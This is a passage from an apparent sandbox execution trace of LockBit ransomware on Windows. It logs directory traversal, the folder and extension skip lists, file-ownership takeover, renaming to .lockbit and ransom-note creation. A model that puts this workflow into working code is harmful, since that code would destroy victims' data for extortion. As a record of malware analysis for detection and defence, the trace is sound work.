lpString2="tipresx.dll.mui") returned -1 [0090.925] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0090.925] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\") returned="" [0090.925] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui") returned=".mui" [0090.925] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0090.925] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0090.925] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0090.925] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0090.926] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0090.926] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0090.926] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui.lockbit") returned 81 [0090.926] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0090.926] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui.lockbit")) returned 0 [0090.927] GetLastError () returned 0x5 [0090.927] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0090.927] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0090.927] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0090.927] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0090.928] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0090.928] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0090.928] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0090.928] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0090.992] NtClose (Handle=0x3c0) returned 0x0 [0090.992] RtlFreeAnsiString (AnsiString="\\") [0090.992] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0090.993] malloc (_Size=0x200) returned 0x53fcc0 [0090.993] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0090.993] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0090.993] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0090.993] CloseHandle (hObject=0x3c0) returned 1 [0090.993] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0090.993] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0090.993] free (_Block=0x53fcc0) [0090.993] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0090.993] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui.lockbit")) returned 1 [0090.994] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0090.994] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0090.994] malloc (_Size=0x40068) returned 0x206b860 [0090.994] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=4096) returned 1 [0090.994] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0091.053] GetLastError () returned 0x3e5 [0091.053] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned 1 [0091.053] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\Restore-My-Files.txt") returned 78 [0091.053] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0091.053] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0091.054] malloc (_Size=0x40068) returned 0x20abae0 [0091.054] WriteFile (in: hFile=0x3c4, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0091.055] GetLastError () returned 0x3e5 [0091.056] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0091.056] GetLastError () returned 0x12 [0091.056] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0091.056] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0091.056] lstrcmpiW (lpString1=".", lpString2="hu-HU") returned -1 [0091.056] lstrcmpiW (lpString1="..", lpString2="hu-HU") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="$windows.~bt") returned 1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="intel") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="msocache") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="$recycle.bin") returned 1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="$windows.~ws") returned 1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="tor browser") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="boot") returned 1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="system volume information") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="perflogs") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="google") returned 1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="application data") returned 1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="windows") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="windows.old") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="appdata") returned 1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="Windows nt") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="Msbuild") returned -1 [0091.056] lstrcmpiW (lpString1="hu-HU", lpString2="Microsoft") returned -1 [0091.057] lstrcmpiW (lpString1="hu-HU", lpString2="All users") returned 1 [0091.057] lstrcmpiW (lpString1="hu-HU", lpString2="mozilla") returned -1 [0091.057] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned 57 [0091.057] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*") returned 59 [0091.057] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0091.057] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.057] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0091.058] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0091.058] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.058] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0091.058] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0091.058] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0091.058] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0091.058] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0091.058] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0091.058] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0091.058] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0091.058] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0091.058] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0091.058] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0091.059] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0091.059] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0091.059] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0091.059] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0091.059] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0091.059] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0091.059] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0091.059] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0091.059] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0091.059] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0091.059] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0091.059] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0091.059] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0091.059] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0091.060] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\") returned="" [0091.060] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui") returned=".mui" [0091.060] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0091.060] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0091.060] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0091.061] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0091.061] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui.lockbit") returned 81 [0091.061] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0091.061] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui.lockbit")) returned 0 [0091.065] GetLastError () returned 0x5 [0091.065] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0091.065] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0091.065] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.065] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0091.065] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0091.065] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0091.066] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0091.066] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0091.074] NtClose (Handle=0x3c0) returned 0x0 [0091.074] RtlFreeAnsiString (AnsiString="\\") [0091.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0091.074] malloc (_Size=0x200) returned 0x53fcc0 [0091.075] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0091.075] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0091.075] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0091.075] CloseHandle (hObject=0x3c0) returned 1 [0091.075] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0091.075] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0091.075] free (_Block=0x53fcc0) [0091.075] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0091.075] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui.lockbit")) returned 1 [0091.076] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0091.076] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0091.076] malloc (_Size=0x40068) returned 0x206b860 [0091.077] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=3584) returned 1 [0091.077] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0091.078] GetLastError () returned 0x3e5 [0091.078] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned 1 [0091.078] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\Restore-My-Files.txt") returned 78 [0091.078] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0091.079] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0091.079] malloc (_Size=0x40068) returned 0x20abae0 [0091.079] WriteFile (in: hFile=0x3c4, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0091.081] GetLastError () returned 0x3e5 [0091.081] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, 